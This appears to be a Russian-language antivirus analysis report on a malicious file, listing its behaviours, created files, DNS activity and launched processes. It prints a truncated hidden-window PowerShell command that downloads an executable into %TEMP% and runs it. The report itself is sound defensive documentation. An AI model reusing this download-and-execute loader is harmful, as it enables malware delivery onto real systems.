Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $itzstwfs как %temp%\wfb3.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Tbmccskz4([String] $Itzstwfs){(New-Object System.Net.WebClient).DownloadFile($Itzstwfs,''%TEMP%\wfb3.exe'');Start-Process ''%TEMP%\wfb3.exe'';}try{Tbmccskz...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\pmktjfukubya.bat
Сетевая активность
UDP
- DNS ASK df###dfgd.png
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Tbmccskz4([String] $Itzstwfs){(New-Object System.Net.WebClient).DownloadFile($Itzstwfs,''%TEMP%\wfb3.exe'');Start-Process ''%TEMP%\wfb3.exe'';}try{Tbmccskz...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pmktjfukubya.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\pmktjfukubya.bat" "
